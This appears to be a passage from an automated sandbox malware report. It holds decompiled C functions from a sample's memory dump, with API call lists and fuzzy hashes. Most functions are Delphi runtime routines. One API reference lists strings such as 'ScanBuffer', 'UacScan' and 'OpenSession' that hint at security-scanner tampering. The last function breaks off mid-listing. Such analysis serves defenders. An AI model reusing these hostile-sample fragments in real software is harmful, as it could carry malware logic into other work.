                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E0326E348(signed short* __eax, void* __ecx) {
                    				void* _t7;
                    				signed short _t18;
                    				intOrPtr* _t19;
                    
                    				_t12 = __eax;
                    				_t18 =  *__eax & 0x0000ffff;
                    				if(_t18 >= 0x14) {
                    					if(_t18 != 0x100) {
                    						if(_t18 != 0x101) {
                    							if((_t18 & 0x00002000) == 0) {
                    								_t7 = E03272E88(_t18, _t19);
                    								if(_t7 == 0) {
                    									L0326CDCC();
                    									L0326CDC4();
                    								} else {
                    									_t7 =  *((intOrPtr*)( *((intOrPtr*)( *_t19)) + 0x24))();
                    								}
                    							} else {
                    								_t7 = E0326E1CC(__eax);
                    							}
                    						} else {
                    							_t7 =  *0x329e29c();
                    						}
                    					} else {
                    						 *__eax = 0;
                    						_t7 = E032644A0( &(__eax[4]));
                    					}
                    				} else {
                    					_push(__eax); // executed
                    					L0326CDCC(); // executed
                    					_t7 = E0326E014(__eax);
                    				}
                    				return _t7;
                    			}







                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: bb7954ca2bed2c71880699bff8de0a32f381e8c1452ff9e2061d01778642f373
                    • Instruction ID: d44e7bbf5bee79c71354db64c95f00bc3a20ac5be0d77b71bcbf7609645eb53c
                    • Opcode Fuzzy Hash: bb7954ca2bed2c71880699bff8de0a32f381e8c1452ff9e2061d01778642f373
                    • Instruction Fuzzy Hash: 0FF0C22D734210C7C710FB38DF84579379C9FD0610726B466E4879F296CBA48CE583A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E032770D4(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, signed char* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
                    				char _v36;
                    				intOrPtr* _v40;
                    				intOrPtr* _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int* _v56;
                    				signed int* _v60;
                    				signed int _v64;
                    				signed int* _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				intOrPtr _v80;
                    				char _v84;
                    				signed int _v1620;
                    				signed int _t140;
                    				intOrPtr _t141;
                    				intOrPtr* _t142;
                    				intOrPtr _t145;
                    				signed char _t153;
                    				signed char _t154;
                    				signed int* _t161;
                    				signed int _t203;
                    				signed int _t204;
                    				void* _t205;
                    				intOrPtr _t219;
                    				intOrPtr _t220;
                    				intOrPtr _t221;
                    				signed int _t250;
                    				intOrPtr _t251;
                    				signed char* _t253;
                    				void* _t256;
                    				void* _t257;
                    				intOrPtr _t258;
                    				void* _t272;
                    
                    				_t272 = __fp0;
                    				_t256 = _t257;
                    				_t258 = _t257 + 0xfffff9b0;
                    				_v44 = __ecx;
                    				_t253 = __edx;
                    				_v40 = __eax;
                    				_t219 =  *0x326cd60; // 0x326cd64
                    				E03264F04( &_v36, _t219);
                    				_push(_t256);
                    				_push(0x32773ff);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t258;
                    				_v52 = 0;
                    				_t207 = 0;
                    				_push(_t256);
                    				_push(0x32773dc);
                    				_push( *[fs:ecx]);
                    				 *[fs:ecx] = _t258;
                    				_t250 =  *(__edx + 1) & 0x000000ff;
                    				if(_t250 > 0x40) {
                    					_t207 =  *0x329a818; // 0x3276a08
                    					E0326B02C(_t207, 1);
                    					E03263E5C();
                    				}
                    				if(_t250 == 0) {
                    					L25:
                    					_v84 =  &_v1620;
                    					_v80 = _v44 + 4;
                    					_v76 = _t250;
                    					_v72 = _t253[2] & 0x000000ff;
                    					_t220 =  *_v44;
                    					_t140 =  *_t253 & 0x000000ff;
                    					if(_t140 != 4) {
                    						__eflags = _t140 - 1;
                    						if(__eflags == 0) {
                    							__eflags = _t250;
                    							if(__eflags == 0) {
                    								__eflags = _a4;
                    								if(__eflags != 0) {
                    									_t140 = 3;
                    								}
                    							}
                    						}
                    					} else {
                    						if((_v1620 & 0x00000fff) == 9) {
                    							_t140 = 8;
                    						}
                    						 *_v44 = 0xfffffffd;
                    						_v80 = _v80 - 4;
                    						_v72 = _v72 + 1;
                    					}
                    					_push(0);
                    					_push( &_v36);
                    					_push(_a4);
                    					_t210 =  &_v84;
                    					_push( &_v84);
                    					_push(_t140);
                    					_push(0);
                    					_t141 =  *0x329a858; // 0x3289a04
                    					_push(_t141);
                    					_push(_t220);
                    					_t142 = _v40;
                    					_push(_t142);
                    					if( *((intOrPtr*)( *_t142 + 0x18))() != 0) {
                    						E032776AC();
                    					}
                    					_t203 = _v52;
                    					if(_t203 == 0) {
                    						L39:
                    						_t145 = 0;
                    						_pop(_t221);
                    						 *[fs:eax] = _t221;
                    						_push(0x32773e3);
                    						_t204 = _v52;
                    						if(_t204 == 0) {
                    							L41:
                    							return _t145;
                    						} else {
                    							goto L40;
                    						}
                    						do {
                    							L40:
                    							_t204 = _t204 - 1;
                    							_t145 =  *((intOrPtr*)(_t256 + _t204 * 8 - 0x250));
                    							_push(_t145);
                    							L0326CDB4();
                    						} while (_t204 != 0);
                    						goto L41;
                    					} else {
                    						do {
                    							_t203 = _t203 - 1;
                    							_t254 = _t256 + _t203 * 8 - 0x250;
                    							_t251 =  *((intOrPtr*)(_t256 + _t203 * 8 - 0x250 + 4));
                    							_t268 = _t251;
                    							if(_t251 != 0) {
                    								E03265350( *_t254, _t210, _t251, _t268);
                    							}
                    						} while (_t203 != 0);
                    						goto L39;
                    					}
                    				} else {
                    					_v56 = _a8;
                    					_v60 = _t256 + (_t250 + _t250) * 8 - 0x650;
                    					_t205 = 0;
                    					do {
                    						_v60 = _v60 - 0x10;
                    						_t153 = _t253[_t205 + 3] & 0x000000ff;
                    						_v48 = _t153 & 0x7f;
                    						_t154 = _t153 & 0x00000080;
                    						if(_v48 != 0xa) {
                    							__eflags = _v48 - 0x48;
                    							if(_v48 != 0x48) {
                    								__eflags = _t154;
                    								if(_t154 == 0) {
                    									__eflags = _v48 - 0xc;
                    									if(_v48 != 0xc) {
                    										 *_v60 = _v48;
                    										_v60[2] =  *_v56;
                    										__eflags = _v48 - 5;
                    										if(_v48 >= 5) {
                    											__eflags = _v48 - 7;
                    											if(_v48 <= 7) {
                    												_t93 =  &_v56;
                    												 *_t93 =  &(_v56[1]);
                    												__eflags =  *_t93;
                    												_v60[3] =  *_v56;
                    											}
                    										}
                    									} else {
                    										__eflags =  *_v56 - 0x100;
                    										if( *_v56 != 0x100) {
                    											_t161 = _v56;
                    											 *_v60 =  *_t161;
                    											_v60[1] = _t161[1];
                    											_t207 = _v60;
                    											_v60[2] = _t161[2];
                    											_v60[3] = _t161[3];
                    											_v56 =  &(_v56[3]);
                    										} else {
                    											_v68 = _t256 + _v52 * 8 - 0x250;
                    											 *_v68 = E03265374(_v56[2], _t207);
                    											_v68[1] = 0;
                    											 *_v60 = 8;
                    											_v60[2] =  *_v68;
                    											_v52 = _v52 + 1;
                    										}
                    									}
                    									goto L23;
                    								}
                    								__eflags = _v48 - 0xc;
                    								if(_v48 == 0xc) {
                    									__eflags =  *( *_v56) - 0x100;
                    									if( *( *_v56) == 0x100) {
                    										_t207 = 8;
                    										E0326EABC( *_v56, 8,  *_v56, _t250, _t272);
                    									}
                    								}
                    								 *_v60 = _v48 | 0x00004000;
                    								_v60[2] =  *_v56;
                    								goto L23;
                    							} else {
                    								_v64 = _t256 + _v52 * 8 - 0x250;
                    								__eflags = _t154;
                    								if(_t154 == 0) {
                    									 *_v64 = E03265374( *_v56, _t207);
                    									__eflags = 0;
                    									 *(_v64 + 4) = 0;
                    									 *_v60 = 8;
                    									_v60[2] =  *_v64;
                    								} else {
                    									 *_v64 = E03265374( *( *_v56), _t207);
                    									 *(_v64 + 4) =  *_v56;
                    									 *_v60 = 0x4008;
                    									_v60[2] = _v64;
                    								}
                    								_v52 = _v52 + 1;
                    								L23:
                    								_t98 =  &_v56;
                    								 *_t98 =  &(_v56[1]);
                    								__eflags =  *_t98;
                    								goto L24;
                    							}
                    						} else {
                    							 *_v60 = 0xa;
                    							_v60[2] = 0x80020004;
                    						}
                    						L24:
                    						_t205 = _t205 + 1;
                    					} while (_t250 != _t205);
                    					goto L25;
                    				}
                    			}






































                    APIs
                    • SysFreeString.OLEAUT32(?), ref: 032773D2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: FreeString
                    • String ID: H
                    • API String ID: 3341692771-2852464175
                    • Opcode ID: 456a60a71ac524b4de9c76ee92d17f57b46975cfa74c605fb666da2af519a3ec
                    • Instruction ID: 5f6239e88e0945bdab9b8a7a23b3e1f7acf88afb3567ed387bde4188875cdc74
                    • Opcode Fuzzy Hash: 456a60a71ac524b4de9c76ee92d17f57b46975cfa74c605fb666da2af519a3ec
                    • Instruction Fuzzy Hash: BBB1D574A11609DFDB14CF99D4809ADBBF6FF8A310F248169E815AB361D770AC85CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E0326E3E0(intOrPtr _a4, signed short* _a8, intOrPtr _a12, char _a16) {
                    				void* _v8;
                    				char* _v12;
                    				char _v28;
                    				void* __ebp;
                    				signed int _t27;
                    				intOrPtr _t28;
                    				intOrPtr _t41;
                    				intOrPtr _t47;
                    				void* _t54;
                    				signed short* _t56;
                    				void* _t59;
                    				intOrPtr _t63;
                    				void* _t71;
                    				void* _t73;
                    				intOrPtr _t74;
                    
                    				_t71 = _t73;
                    				_t74 = _t73 + 0xffffffe8;
                    				_t56 = _a8;
                    				if( *_t56 != 0x400c) {
                    					__eflags = _a4;
                    					if(_a4 != 0) {
                    						_push( &_v28);
                    						L0326CDC4();
                    						_v12 =  &_v28;
                    					} else {
                    						_v12 = 0;
                    					}
                    					_push(_t71);
                    					_push(0x326e4d4);
                    					_push( *[fs:eax]);
                    					 *[fs:eax] = _t74;
                    					_t68 =  *_t56 & 0x0000ffff;
                    					_t27 =  *_t56 & 0xffff;
                    					__eflags = _t27 - 0x101;
                    					if(__eflags > 0) {
                    						_t28 = _t27 - 0x4009;
                    						__eflags = _t28;
                    						if(_t28 == 0) {
                    							goto L12;
                    						} else {
                    							__eflags = _t28 != 4;
                    							if(_t28 != 4) {
                    								goto L14;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    					} else {
                    						if(__eflags == 0) {
                    							L12:
                    							__eflags =  *0x329e298;
                    							if( *0x329e298 != 0) {
                    								 *0x329e298(_v12, _t56, _a12,  &_a16); // executed
                    							}
                    						} else {
                    							_t47 = _t27 - 9;
                    							__eflags = _t47;
                    							if(_t47 == 0) {
                    								goto L12;
                    							} else {
                    								__eflags = _t47 == 4;
                    								if(_t47 == 4) {
                    									goto L12;
                    								} else {
                    									L14:
                    									_t41 = E03272E88(_t68,  &_v8);
                    									__eflags = _t41;
                    									if(_t41 == 0) {
                    										E0326DC7C(_t59);
                    									} else {
                    										 *((intOrPtr*)( *_v8 + 0x10))( &_a16, _a12);
                    									}
                    								}
                    							}
                    						}
                    					}
                    					_pop(_t63);
                    					 *[fs:eax] = _t63;
                    					_push(0x326e4db);
                    					__eflags = _v12;
                    					if(_v12 != 0) {
                    						E0326E7F0(_a4, _v12);
                    						return E0326E3C4( &_v28);
                    					}
                    					return 0;
                    				} else {
                    					_t54 = E0326E3E0(_a4, _t56[4], _a12, _a16);
                    					return _t54;
                    				}
                    			}



















                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: InitVariant
                    • String ID:
                    • API String ID: 1927566239-0
                    • Opcode ID: a9937d5f975b0362b0c959eb005e2c01a8d94b66c7c7654237d7c42efce1881e
                    • Instruction ID: 60b8cdb508d6378c8604c3829b35ad1563244fedd2f78728edaa0a62c7bb1381
                    • Opcode Fuzzy Hash: a9937d5f975b0362b0c959eb005e2c01a8d94b66c7c7654237d7c42efce1881e
                    • Instruction Fuzzy Hash: 91316F79A20209EFDB20DFBCDA849AE77ACFF08210F5A4461E904D7284E674D9D0C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 32%
                    			E03276D64(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                    				char _v8;
                    				intOrPtr _t21;
                    				intOrPtr _t26;
                    
                    				_push(0);
                    				_push(_t26);
                    				_push(0x3276db1);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t26;
                    				E03264DA4( &_v8, __eax);
                    				_push(E03264DB4(_v8)); // executed
                    				L0326CDAC(); // executed
                    				E03276D54(_t9);
                    				_pop(_t21);
                    				 *[fs:eax] = _t21;
                    				_push(0x3276db8);
                    				return E03264C24( &_v8);
                    			}







                    APIs
                    • CLSIDFromProgID.OLE32(00000000,?,00000000,03276DB1,?,?,?,00000000), ref: 03276D91
                      • Part of subcall function 03264C24: SysFreeString.OLEAUT32(0327D70C), ref: 03264C32
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: FreeFromProgString
                    • String ID:
                    • API String ID: 4225568880-0
                    • Opcode ID: 8258eb90c0f2abb7854e53c7d8fe9a6bfd3625f0be7c5bba9f522585b8419c42
                    • Instruction ID: 7edbcc01d6e16f6046a15abf67d181a6b3fe2e3cb510b80751cc31bcfe059190
                    • Opcode Fuzzy Hash: 8258eb90c0f2abb7854e53c7d8fe9a6bfd3625f0be7c5bba9f522585b8419c42
                    • Instruction Fuzzy Hash: 8BE09B79634708BFD701FBA1CC51D9E77ECEF89610B620471E844E7611D9B55D848464
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0326582C(void* __eax) {
                    				char _v272;
                    				intOrPtr _t14;
                    				void* _t16;
                    				intOrPtr _t18;
                    				CHAR* _t19;
                    
                    				_t16 = __eax;
                    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                    					_t3 = _t16 + 4; // 0x3260000
                    					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                    					_t14 = E03265A90(_t19); // executed
                    					_t18 = _t14;
                    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                    					if(_t18 == 0) {
                    						_t5 = _t16 + 4; // 0x3260000
                    						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                    					}
                    				}
                    				_t7 = _t16 + 0x10; // 0x3260000
                    				return  *_t7;
                    			}









                    APIs
                    • GetModuleFileNameA.KERNEL32(03260000,?,00000105), ref: 0326584A
                      • Part of subcall function 03265A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,03260000,03289790), ref: 03265AAC
                      • Part of subcall function 03265A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03260000,03289790), ref: 03265ACA
                      • Part of subcall function 03265A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03260000,03289790), ref: 03265AE8
                      • Part of subcall function 03265A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03265B06
                      • Part of subcall function 03265A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,03265B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03265B4F
                      • Part of subcall function 03265A90: RegQueryValueExA.ADVAPI32(?,03265CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,03265B95,?,80000001), ref: 03265B6D
                      • Part of subcall function 03265A90: RegCloseKey.ADVAPI32(?,03265B9C,00000000,?,?,00000000,03265B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03265B8F
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Open$FileModuleNameQueryValue$Close
                    • String ID:
                    • API String ID: 2796650324-0
                    • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                    • Instruction ID: b0983b57d190591269c875159ecc4f330d0620752946d9acad1351e2d5a6ac83
                    • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                    • Instruction Fuzzy Hash: 3BE06D71A103158BCB10DE5898C0A5633D8AF09754F1809A1EC54CF246D3B0D9E08BD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E03267E40(void* __eax) {
                    				signed char _t5;
                    
                    				_t5 = GetFileAttributesA(E03264964(__eax)); // executed
                    				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}





                    APIs
                    • GetFileAttributesA.KERNEL32(00000000,03392880,0327DEBB,ScanString,03286AA0,ScanBuffer,03286AA0,UacInitialize,03286AA0,UacScan,03286AA0,Initialize,03286AA0,ScanBuffer,03286AA0,OpenSession), ref: 03267E4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                    • Instruction ID: a5bf0bfd8bdcf5bcb9c7f138bf317d98e95398b38ba0c312ab99b58997b91734
                    • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                    • Instruction Fuzzy Hash: 19C08CE82323060A3A50EAFC3CC416D42C80D4503CB380E21E078DA2D1D26698EA2460
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E032874EC(int __eax) {
                    				int _t3;
                    
                    				_t3 = timeSetEvent(__eax, 0, E032874E0, 0, 1); // executed
                    				 *0x3392864 = _t3;
                    				return _t3;
                    			}





                    APIs
                    • timeSetEvent.WINMM(00002710,00000000,032874E0,00000000,00000001), ref: 032874FC
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Eventtime
                    • String ID:
                    • API String ID: 2982266575-0
                    • Opcode ID: 9b3594c8772012f492f44a464bc0541587166dbdb17c51f956c1ab85939765dc
                    • Instruction ID: bed32331460bfa808e232bbe9520cd2a53370b42f725718835946dd6a70dfcad
                    • Opcode Fuzzy Hash: 9b3594c8772012f492f44a464bc0541587166dbdb17c51f956c1ab85939765dc
                    • Instruction Fuzzy Hash: 4EC092F13A630C7BF620B7A91CC2F2B199CDB04B21FA00452B664EE2E2D2E258804664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E032615CC(signed int __eax) {
                    				void* _t4;
                    				intOrPtr _t7;
                    				signed int _t8;
                    				void* _t10;
                    				void** _t15;
                    				void* _t17;
                    
                    				_t8 = __eax;
                    				E03261560(__eax);
                    				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
                    				if(_t4 == 0) {
                    					 *0x329b720 = 0;
                    					return 0;
                    				} else {
                    					_t15 =  *0x329b70c; // 0x91c0000
                    					_t10 = _t4;
                    					 *_t10 = 0x329b708;
                    					 *0x329b70c = _t4;
                    					 *(_t10 + 4) = _t15;
                    					 *_t15 = _t4;
                    					_t17 = _t4 + 0x140000;
                    					 *((intOrPtr*)(_t17 - 4)) = 2;
                    					 *0x329b720 = 0x13fff0 - _t8;
                    					_t7 = _t17 - _t8;
                    					 *0x329b71c = _t7;
                    					 *(_t7 - 4) = _t8 | 0x00000002;
                    					return _t7;
                    				}
                    			}










                    APIs
                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,03261A03), ref: 032615E2
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 5f80ecd3e015b77ef03f45690155ecf774c51eb6ece6bdb898cb7e0be7a2bf75
                    • Instruction ID: 650e818a97476e281326cd7ee52f079e22cecd9f8b0cca78fed5069ba6cf7c9c
                    • Opcode Fuzzy Hash: 5f80ecd3e015b77ef03f45690155ecf774c51eb6ece6bdb898cb7e0be7a2bf75
                    • Instruction Fuzzy Hash: CAF0F9F1B113004FEB05EF79BD94355BAD6EB89244F24C27AD609DB398E771A4418B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E03261682(intOrPtr __eax) {
                    				void* _t6;
                    				void** _t9;
                    				void* _t11;
                    				void* _t15;
                    				long _t20;
                    				intOrPtr _t24;
                    
                    				_t24 = __eax;
                    				_t20 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                    				_t6 = VirtualAlloc(0, _t20, 0x101000, 4); // executed
                    				_t11 = _t6;
                    				if(_t11 != 0) {
                    					_t15 = _t11;
                    					 *((intOrPtr*)(_t15 + 8)) = _t24;
                    					 *(_t15 + 0xc) = _t20 | 0x00000004;
                    					E03261644();
                    					_t9 =  *0x329d7b0; // 0x7fde0000
                    					 *_t15 = 0x329d7ac;
                    					 *0x329d7b0 = _t11;
                    					 *(_t15 + 4) = _t9;
                    					 *_t9 = _t11;
                    					 *0x329d7a8 = 0;
                    					_t11 = _t11 + 0x10;
                    				}
                    				return _t11;
                    			}










                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 032616A4
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 9afe3e03ec66c2c3801c885e8dd6234173f6a9d5ebbcfc230a313bc83c3cbc75
                    • Instruction ID: 02c0679651a0449e02e38c85a5991bcaa6f0d3f5c5ebc58cde241af41289c5c1
                    • Opcode Fuzzy Hash: 9afe3e03ec66c2c3801c885e8dd6234173f6a9d5ebbcfc230a313bc83c3cbc75
                    • Instruction Fuzzy Hash: F0F0BEB6A007956BE710EF5AAC84B82BB94FB01324F05813AFA089B344D7B0B8908794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E032616E6(void* __eax) {
                    				void* _t5;
                    				signed int _t6;
                    				signed int _t7;
                    				void* _t10;
                    				void* _t13;
                    				void _t16;
                    
                    				_t10 = __eax - 0x10;
                    				E03261644();
                    				_t5 = _t10;
                    				_t16 =  *_t5;
                    				_t13 =  *(_t5 + 4);
                    				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
                    				if(_t6 == 0) {
                    					_t7 = _t6 | 0xffffffff;
                    				} else {
                    					 *_t13 = _t16;
                    					 *(_t16 + 4) = _t13;
                    					_t7 = 0;
                    				}
                    				 *0x329d7a8 = 0;
                    				return _t7;
                    			}










                    APIs
                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,03261FE4), ref: 03261704
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 7d452f8b699fdabd1ba6b3c6d8f30cc8219439e5299bb886243f5a618e3dcf7e
                    • Instruction ID: 933224ce3af5706f7b010b748e45043f5031f9732f678fe291fca87f5e7d7685
                    • Opcode Fuzzy Hash: 7d452f8b699fdabd1ba6b3c6d8f30cc8219439e5299bb886243f5a618e3dcf7e
                    • Instruction Fuzzy Hash: 4AE08C79320311AFE710AB7A5D85B52ABD8EF58664F288476F601DB285D2F0F8A08760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E0326415C(intOrPtr __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                    				void* _t27;
                    				char _t32;
                    				signed int _t33;
                    				signed int _t34;
                    				int _t42;
                    				void* _t55;
                    				intOrPtr _t60;
                    				void _t66;
                    				intOrPtr* _t67;
                    				intOrPtr* _t68;
                    				void* _t69;
                    				intOrPtr _t72;
                    				struct HINSTANCE__* _t87;
                    				intOrPtr _t89;
                    				intOrPtr _t90;
                    				void* _t91;
                    				void* _t92;
                    
                    				_t72 = __edx;
                    				_t60 = __ebx;
                    				_t27 = memcpy(_t89 - 0x3c, 0x329d7c8, 0xb << 2);
                    				_t92 = _t91 + 0xc;
                    				_pop( *0x329d7e8);
                    				_pop( *0x329d7e4);
                    				 *0x329d7dc = _t89;
                    				 *0x329d7e0 = __ebx;
                    				 *0x329d7d0 = _t27;
                    				 *0x329d7d8 = _t72;
                    				 *0x329d7c8 = _t89 - 0x3c;
                    				_t66 = 0;
                    				if( *(_t89 + 0xc) == 0) {
                    					_t66 =  *_t27;
                    				}
                    				 *0x329d7d4 = _t66;
                    				 *0x329b014 = 0x3261178;
                    				 *0x329b018 = 0x3261180;
                    				E03264048();
                    				_t32 =  *(_t89 + 0xc) + 1;
